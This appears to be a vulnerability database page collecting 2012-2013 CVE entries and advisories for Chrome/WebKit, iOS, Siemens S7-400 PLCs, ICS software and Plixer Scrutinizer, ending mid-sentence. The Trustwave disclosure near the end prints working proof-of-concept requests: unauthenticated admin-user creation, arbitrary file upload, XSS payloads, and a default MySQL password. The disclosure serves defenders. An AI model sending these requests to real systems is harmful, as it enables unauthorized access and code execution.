VARIoT IoT vulnerabilities database
| VAR-201208-0339 | CVE-2012-2857 | WebKit (used in multiple products) denial of service (DoS) vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Use-after-free vulnerability in the Cascading Style Sheets (CSS) DOM implementation in Google Chrome before 21.0.1180.57 on Mac OS X and Linux, and before 21.0.1180.60 on Windows and Chrome Frame, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document. This is a WebKit vulnerability: products other than Google Chrome that use WebKit may also be affected. A third party could use a crafted document to cause a denial of service (DoS) or other unspecified impact. Google Chrome is prone to multiple vulnerabilities.
Attackers can exploit these issues to execute arbitrary code in the context of the browser, bypass security restrictions, or cause denial-of-service conditions; other attacks may also be possible.
Versions prior to Chrome 21.0.1180.57 and 21.0.1180.60 are vulnerable. Google Chrome is a web browser developed by Google.
CVE-ID
CVE-2013-0962 : Mario Heiderich of Cure53
For OS X Lion systems Safari 6.0.3 is available via
the Apple Software Update application.
For OS X Mountain Lion systems Safari 6.0.3 is included with
OS X v10.8.3.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-01-28-1 iOS 6.1 Software Update
iOS 6.1 Software Update is now available and addresses the following:
Identity Services
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Authentication relying on certificate-based Apple ID
authentication may be bypassed
Description: An error handling issue existed in Identity Services.
If the user's AppleID certificate failed to validate, the user's
AppleID was assumed to be the empty string. If multiple systems
belonging to different users enter this state, applications relying
on this identity determination may erroneously extend trust. This
issue was addressed by ensuring that NULL is returned instead of an
empty string.
CVE-ID
CVE-2013-0963
International Components for Unicode
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A canonicalization issue existed in the handling of the
EUC-JP encoding, which could lead to a cross-site scripting attack on
EUC-JP encoded websites. This issue was addressed by updating the
EUC-JP mapping table.
CVE-ID
CVE-2011-3058 : Masato Kinugawa
Kernel
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: A user-mode process may be able to access the first page of
kernel memory
Description: The iOS kernel has checks to validate that the user-
mode pointer and length passed to the copyin and copyout functions
would not result in a user-mode process being able to directly access
kernel memory. The checks were not being used if the length was
smaller than one page. This issue was addressed through additional
validation of the arguments to copyin and copyout.
CVE-ID
CVE-2013-0964 : Mark Dowd of Azimuth Security
Security
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials or other sensitive information
Description: Several intermediate CA certificates were mistakenly
issued by TURKTRUST. This may allow a man-in-the-middle attacker to
redirect connections and intercept user credentials or other
sensitive information. This issue was addressed by not allowing the
incorrect SSL certificates.
StoreKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: JavaScript may be enabled in Mobile Safari without user
interaction
Description: If a user disabled JavaScript in Safari Preferences,
visiting a site which displayed a Smart App Banner would re-enable
JavaScript without warning the user. This issue was addressed by not
enabling JavaScript when visiting a site with a Smart App Banner.
CVE-ID
CVE-2013-0974 : Andrew Plotkin of Zarfhome Software Consulting, Ben
Madison of BitCloud, Marek Durcek
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2012-2824 : miaubiz
CVE-2012-2857 : Arthur Gerkis
CVE-2012-3606 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3607 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3621 : Skylined of the Google Chrome Security Team
CVE-2012-3632 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2012-3687 : kuzzcc
CVE-2012-3701 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0948 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0949 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0950 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0951 : Apple
CVE-2013-0952 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0953 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0954 : Dominic Cooney of Google and Martin Barbella of the
Google Chrome Security Team
CVE-2013-0955 : Apple
CVE-2013-0956 : Apple Product Security
CVE-2013-0958 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0959 : Abhishek Arya (Inferno) of the Google Chrome Security
Team
CVE-2013-0968 : Aaron Nelson
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Copying and pasting content on a malicious website may lead
to a cross-site scripting attack
Description: A cross-site scripting issue existed in the handling of
content pasted from a different origin. This issue was addressed
through additional validation of pasted content.
CVE-ID
CVE-2013-0962 : Mario Heiderich of Cure53
WebKit
Available for: iPhone 3GS and later,
iPod touch (4th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to a cross-
site scripting attack
Description: A cross-site scripting issue existed in the handling of
frame elements. This issue was addressed through improved origin
tracking.
CVE-ID
CVE-2012-2889 : Sergey Glazunov
WiFi
Available for: iPhone 3GS, iPhone 4, iPod touch (4th generation),
iPad 2
Impact: A remote attacker on the same WiFi network may be able to
temporarily disable WiFi
Description: An out of bounds read issue exists in Broadcom's
BCM4325 and BCM4329 firmware's handling of 802.11i information
elements. This issue was addressed through additional validation of
802.11i information elements.
CVE-ID
CVE-2012-2619 : Andres Blanco and Matias Eissler of Core Security
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "6.1".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----
----------------------------------------------------------------------
We are millions! Join us to protect all Pc's Worldwide.
Download the new Secunia PSI 3.0 available in 5 languages and share it with your friends:
http://secunia.com/psi
----------------------------------------------------------------------
TITLE:
Google Chrome Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA50105
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50105/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50105
RELEASE DATE:
2012-08-01
DISCUSS ADVISORY:
http://secunia.com/advisories/50105/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/50105/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=50105
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Google Chrome, where
some have an unknown impact and others can be exploited by malicious
people to bypass certain security restrictions and compromise a
user's system.
1) An error when handling renderers can be exploited to bypass the
cross-process policy and cause interference.
NOTE: This vulnerability affects the Linux platform only.
2) The application does not properly re-prompt the user when
downloading multiple files and can be exploited to trick the user
into downloading a malicious file.
3) An error when handling drag and drop events can be exploited to
access certain restricted files.
4) Multiple errors exist within the PDF viewer. No further
information is currently available.
5) Multiple integer overflow errors exist within the PDF viewer.
6) A use-after-free error exists when handling object linkage in
PDFs.
7) An error within the "webRequest" module can be exploited to cause
interference with the Chrome Web Store.
8) A use-after-free error exists within the PDF viewer.
9) An out-of-bounds write error exists within the PDF viewer.
10) A use-after-free error exists when handling CSS DOM objects.
11) An error within the WebP decoder can be exploited to cause a
buffer overflow.
12) An unspecified error exists within tab handling.
NOTE: This vulnerability affects the Linux platform only.
13) An out-of-bounds access error exists when clicking in the date
picker.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
The vendor credits:
1) Julien Tinnes, Google Chrome Security Team
2, 3) Matt Austin, Aspect Security
4, 5, 8, 9) Mateusz Jurczyk and Gynvael Coldwind, Google Security
Team
6) Alexey Samsonov, Google
7) Trev, Adblock
10) Arthur Gerkis
11) Jüri Aedla
12) Jeff Roberts, Google Security Team
13) Chamal de Silva
ORIGINAL ADVISORY:
googlechromereleases.blogspot.com/2012/07/stable-channel-release.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
In certain contexts, an active network attacker could present untrusted
certificates to iTunes and they would be accepted without warning.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201208-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Chromium: Multiple vulnerabilities
Date: August 14, 2012
Bugs: #423719, #426204, #429174
ID: 201208-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been reported in Chromium, some of which
may allow execution of arbitrary code.
Background
==========
Chromium is an open source web browser project.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/chromium < 21.0.1180.57 >= 21.0.1180.57
Description
===========
Multiple vulnerabilities have been discovered in Chromium. Please
review the CVE identifiers and release notes referenced below for
details.
Impact
======
A remote attacker could entice a user to open a specially crafted web
site using Chromium, possibly resulting in the execution of arbitrary
code with the privileges of the process, a Denial of Service condition,
disclosure of sensitive information, or other unspecified impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Chromium users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot -v ">=www-client/chromium-21.0.1180.57"
References
==========
[ 1 ] CVE-2012-2815
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2815
[ 2 ] CVE-2012-2817
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2817
[ 3 ] CVE-2012-2818
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2818
[ 4 ] CVE-2012-2819
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2819
[ 5 ] CVE-2012-2820
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2820
[ 6 ] CVE-2012-2821
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2821
[ 7 ] CVE-2012-2823
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2823
[ 8 ] CVE-2012-2824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2824
[ 9 ] CVE-2012-2825
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2825
[ 10 ] CVE-2012-2826
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2826
[ 11 ] CVE-2012-2829
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2829
[ 12 ] CVE-2012-2830
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2830
[ 13 ] CVE-2012-2831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2831
[ 14 ] CVE-2012-2834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2834
[ 15 ] CVE-2012-2842
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2842
[ 16 ] CVE-2012-2843
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2843
[ 17 ] CVE-2012-2846
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2846
[ 18 ] CVE-2012-2847
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2847
[ 19 ] CVE-2012-2848
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2848
[ 20 ] CVE-2012-2849
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2849
[ 21 ] CVE-2012-2853
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2853
[ 22 ] CVE-2012-2854
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2854
[ 23 ] CVE-2012-2857
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2857
[ 24 ] CVE-2012-2858
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2858
[ 25 ] CVE-2012-2859
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2859
[ 26 ] CVE-2012-2860
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2860
[ 27 ] Release Notes 20.0.1132.43
http://googlechromereleases.blogspot.com/2012/06/stable-channel-update_26.html
[ 28 ] Release Notes 20.0.1132.57
http://googlechromereleases.blogspot.com/2012/07/stable-channel-update.html
[ 29 ] Release Notes 21.0.1180.57
http://googlechromereleases.blogspot.com/2012/07/stable-channel-release.html
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201208-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201208-0419 | CVE-2012-4178 | Symantec Web Gateway 'deptUploads_data.php' SQL Injection Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
SQL injection vulnerability in spywall/includes/deptUploads_data.php in Symantec Web Gateway 5.0.3.18 allows remote attackers to execute arbitrary SQL commands via the groupid parameter. Symantec Web Gateway is a Web security gateway hardware appliance. Attackers can exploit the vulnerability to perform SQL injection attacks, obtain sensitive database information, or take control of the application.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more.
| VAR-201207-0137 | CVE-2012-3016 | Siemens SIMATIC S7-400 PN CPU denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Siemens SIMATIC S7-400 PN CPU devices with firmware 6 before 6.0.3 allow remote attackers to cause a denial of service (defect-mode transition and service outage) via crafted ICMP packets. Siemens SIMATIC is an automation software in a single engineering environment. There is a security hole in SIEMENS SIMATIC S7-400. When the Ethernet port on a SIMATIC S7-400 V6 CPU receives a malformed IP packet, the device enters defect mode. Defect mode locks the CPU, so it can no longer perform process control; an attacker can exploit this to cause a denial of service. SIEMENS SIMATIC S7-400 is prone to multiple denial-of-service vulnerabilities.
Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users.
----------------------------------------------------------------------
TITLE:
Siemens SIMATIC S7-400 Products ICMP Processing Denial of Service
Vulnerability
SECUNIA ADVISORY ID:
SA50115
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50115/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50115
RELEASE DATE:
2012-07-31
DISCUSS ADVISORY:
http://secunia.com/advisories/50115/#comments
DESCRIPTION:
A vulnerability has been reported in some Siemens SIMATIC S7-400
products, which can be exploited by malicious people to cause a DoS
(Denial of Service).
The vulnerability is reported in firmware versions 6.0.1 and 6.0.2 in
the following products:
* CPU 412-2 PN (6ES7412-2EK06-0AB0)
* CPU 414-3 PN/DP (6ES7414-3EM06-0AB0)
* CPU 414F-3 PN/DP (6ES7414-3FM06-0AB0)
* CPU 416-3 PN/DP (6ES7416-3ES06-0AB0)
* CPU 416F-3 PN (6ES7416-3FS06-0AB0)
SOLUTION:
Update to firmware version 6.0.3 (please see the vendor's advisory
for more information).
PROVIDED AND/OR DISCOVERED BY:
The vendor credits ICS-CERT.
ORIGINAL ADVISORY:
SSA-589272:
http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-589272.pdf
----------------------------------------------------------------------
| VAR-201207-0713 | No CVE | SAP Netweaver Cross Site Scripting and Information Disclosure Vulnerabilities |
CVSS V2: - CVSS V3: - Severity: - |
SAP Netweaver is prone to a cross-site scripting vulnerability and an information-disclosure vulnerability.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SAP Netweaver 7.0 is vulnerable; other versions may also be affected.
| VAR-201210-0353 | CVE-2012-4899 | WellinTech KingView Backdoor unauthorized access vulnerability | Related entries in the VARIoT exploits database: VAR-E-201207-0292 |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
WellinTech KingView 6.5.3 and earlier uses a weak password-hashing algorithm, which makes it easier for local users to discover credentials by reading an unspecified file. KingView is a product for building a data information service platform for industrial automation. Wellintech KingView has a default authentication credential that an attacker could use to log in to the application for unauthorized access using this undocumented default user. WellinTech KingView is prone to an unauthorized-access vulnerability due to a backdoor in all versions of the application.
Attackers can exploit this issue to gain unauthorized access to the affected application. This may aid in further attacks.
| VAR-201207-0139 | CVE-2012-3018 | ICONICS GENESIS32 and BizViz access restriction bypass vulnerability | Related entries in the VARIoT exploits database: VAR-E-201207-0679 |
CVSS V2: 4.4 CVSS V3: - Severity: MEDIUM |
The lockout-recovery feature in the Security Configurator component in ICONICS GENESIS32 9.22 and earlier and BizViz 9.22 and earlier uses an improper encryption algorithm for generation of an authentication code, which allows local users to bypass intended access restrictions and obtain administrative access by predicting a challenge response. GENESIS32/BizViz is a new generation of industrial control software developed by ICONICS. Iconics GENESIS32 and BizViz are prone to a local authentication-bypass vulnerability. Successful exploits may lead to other attacks.
Iconics GENESIS32 and BizViz versions 9.22 and prior are vulnerable.
----------------------------------------------------------------------
TITLE:
ICONICS GENESIS32 / BizViz Privilege Escalation Vulnerability
SECUNIA ADVISORY ID:
SA50116
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/50116/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=50116
RELEASE DATE:
2012-07-31
DISCUSS ADVISORY:
http://secunia.com/advisories/50116/#comments
DESCRIPTION:
A vulnerability has been reported in ICONICS GENESIS32 and ICONICS
BizViz, which can be exploited by malicious, local users to gain
escalated privileges. This can be exploited to gain
administrative access by predicting a challenge response.
SOLUTION:
Apply patches. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY:
ICS-CERT credits Dr. Wesley McGrew, Mississippi State University.
ORIGINAL ADVISORY:
ICS-CERT:
http://www.us-cert.gov/control_systems/pdf/ICSA-12-212-01.pdf
----------------------------------------------------------------------
| VAR-201207-0138 | CVE-2012-3017 | Siemens SIMATIC S7-400 PN CPU denial of service (DoS) vulnerability |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Siemens SIMATIC S7-400 PN CPU devices with firmware 5.x allow remote attackers to cause a denial of service (defect-mode transition and service outage) via (1) malformed HTTP traffic or (2) malformed IP packets. Siemens SIMATIC is an automation software in a single engineering environment. There is a security hole in SIEMENS SIMATIC S7-400. When the Ethernet port on a SIMATIC S7-400 V5 CPU receives a malformed IP or HTTP message, the device enters defect mode. Defect mode locks the CPU, so it can no longer perform process control; an attacker can exploit this to cause a denial of service. SIEMENS SIMATIC S7-400 is prone to multiple denial-of-service vulnerabilities.
Remote attackers may exploit this issue to cause denial-of-service conditions, denying service to legitimate users. The vulnerabilities exist in Siemens SIMATIC S7-400 PN CPU firmware version 5.x.
| VAR-201207-0526 | CVE-2012-2647 | Yahoo! Toolbar (for Chrome, Safari) vulnerable to toolbar alteration |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
Yahoo! Toolbar 1.0.0.5 and earlier for Chrome and Safari allows remote attackers to modify the configured search URL, and intercept search terms, via a crafted web page. Yahoo! Toolbar (for Chrome, Safari) contains a vulnerability where the toolbar may be altered. Keita Haga of keitahaga.com reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership. A remote attacker may alter the toolbar. As a result, keywords entered in the toolbar may be leaked to a third party. Yahoo! Toolbar is prone to a remote security vulnerability. Yahoo! Toolbar is a web browser toolbar from Yahoo! that can be used on Microsoft IE and Mozilla Firefox. It supports custom toolbars and lets users check email and browse weather forecasts, news, and other information anytime, anywhere.
| VAR-201207-0529 | CVE-2012-2627 | Plixer Scrutinizer (Dell SonicWALL Scrutinizer) Vulnerable to creating or overwriting arbitrary files |
CVSS V2: 9.4 CVSS V3: - Severity: HIGH |
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request. Scrutinizer is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting.
Trustwave SpiderLabs Security Advisory TWSL2012-014:
Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer
Published: 07/27/12
Version: 1.0
Vendor: Plixer International (http://www.plixer.com)
Product: Scrutinizer NetFlow and sFlow Analyzer
Version affected: Confirmed 9.0.1 (Build 9.0.1.19899) and prior versions
may be affected as well. Please note that the software can be found in a
long list of other products. Visit http://www.plixer.com/Scrutinizer-Netflow-Sflow/scrutinizer.html
for the partial list.
Product description:
A network analysis tool for monitoring overall network health and reporting
on which hosts, applications, protocols, etc. are consuming network
bandwidth.
Credits:
Mario Ceballos of the Metasploit Project
Jonathan Claudius of Trustwave Spiderlabs
Finding 1: HTTP Authentication Bypass Vulnerability
CVE: CVE-2012-2626
The Scrutinizer web console provides a form-based login facility, requiring
users to authenticate to gain access to further functionality. A tiered
user access model is also used, where administrative and standard users
have a different selection of permissible functions. Authentication and
authorization are controlled by the cookie-based session management system.
Although this is implemented in a standardized way, the session tokens are
not required to perform privileged functions, such as adding users.
Example(s):
This request will add a user named "trustwave" with the password of
"trustwave" to the administrative user group.
#Request
POST /cgi-bin/admin.cgi HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:52:15 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 19
Content-Type: text/html; charset=utf-8

{"new_user_id":"2"}
Finding 2: Arbitrary File Upload Vulnerability
CVE: CVE-2012-2627
The Scrutinizer web console is prone to an unauthenticated arbitrary file
upload vulnerability.
Example(s):
This request will upload a test file to the following location:
'C:\Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt'
Note: This affected folder also contains SNMP configuration files which could
be overwritten if an attacker were to select the right file name.
#Request
POST /d4d/uploader.php HTTP/1.0
Host: A.B.C.D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_949_3365333252_3066945593
Content-Length: 210

--_Part_949_3365333252_3066945593
Content-Disposition: form-data;
name="uploadedfile"; filename="trustwave.txt"
Content-Type: application/octet-stream
trustwave
--_Part_949_3365333252_3066945593--
#Response
HTTP/1.1 200 OK
Date: Wed, 25 Apr 2012 17:39:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 41
Connection: close
Content-Type: text/html

{"success":1,"file_name":"trustwave.txt"}
#Confirming on File System
C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt"
trustwave
Finding 3: Multiple Cross-site Scripting Vulnerabilities in exporters.php and contextMenu.php
CVE: CVE-2012-3848
The Scrutinizer web console suffers from multiple Cross Site Scripting
vulnerabilities in the following pages:
1.) /d4d/contextMenu.php
2.) /d4d/exporters.php
These vulnerabilities include the following:
1.) XSS via arbitrary parameter
3.) XSS via referrer header
Example(s):
The following two examples demonstrate the above-mentioned vulnerabilities on exporters.php.
#Request 1
GET /d4d/exporters.php?a<script>alert(123)</script>=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
#Response 1
<snip>
<a href="/d4d/exporters.php?a<script>alert(1)</script>=1">/d4d/exporters.php?a<script>alert(123)</script>=1</a></td></tr>
<snip>
#Request 2
GET /d4d/exporters.php HTTP/1.1
Host: A.B.C.D
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1
Content-Length: 2
#Response 2
<snip>
<a href="http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1">http://D.E.F.G/search?hl=en&q=a<script>alert(123)</script>=1</a>
<snip>
Finding 4: Undocumented Default Admin MySQL Users
CVE: CVE-2012-3951
The Scrutinizer application relies on an underlying Apache, MySQL and PHP
installation that is deployed as part of the Scrutinizer installer
package. The installation of these packages is transparent to the user
during the Scrutinizer installation.
The installer selects default passwords for internal MySQL users; these
passwords are not configured by the user and could easily be guessed by an
attacker. There is currently no way to change these values within the
Scrutinizer application, and changing them manually in the MySQL instance
has unknown effects on the application due to hardcoded values for some of
these accounts.
Example(s):
The following MySQL query can be run to list the users and their respective
password hashes:
#Request
select User,Password from mysql.user;
#Response
User        | Password
root        |
root        |
scrutinizer | *4ACFE3202A5FF5CF467898FC58AAB1D615029441
scrutremote | *4ACFE3202A5FF5CF467898FC58AAB1D615029441
Note 1: the hash above, shared by the 'scrutinizer' and 'scrutremote'
users, is the MySQL hash of the password 'admin'.
Note 2: the 'scrutinizer' and 'scrutremote' users have select, update,
delete, create, drop, and further privileges within the MySQL instance.
Note 3: by default, the MySQL instance is bound to "0.0.0.0", i.e. every
network interface on the system, allowing users with the proper access
rights to interact directly with the MySQL instance.
Remediation Steps:
Customers should update to the latest version of Scrutinizer NetFlow &
sFlow Analyzer in order to address findings 1, 2 and 3. These issues have been
corrected in version 9.5.0.
Revision History:
05/02/12 - Vulnerability disclosed
05/16/12 - Patch released by vendor
07/11/12 - Vendor publishes announcement
07/27/12 - Advisory published
References
1. http://www.plixer.com
2. http://blog.spiderlabs.com
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
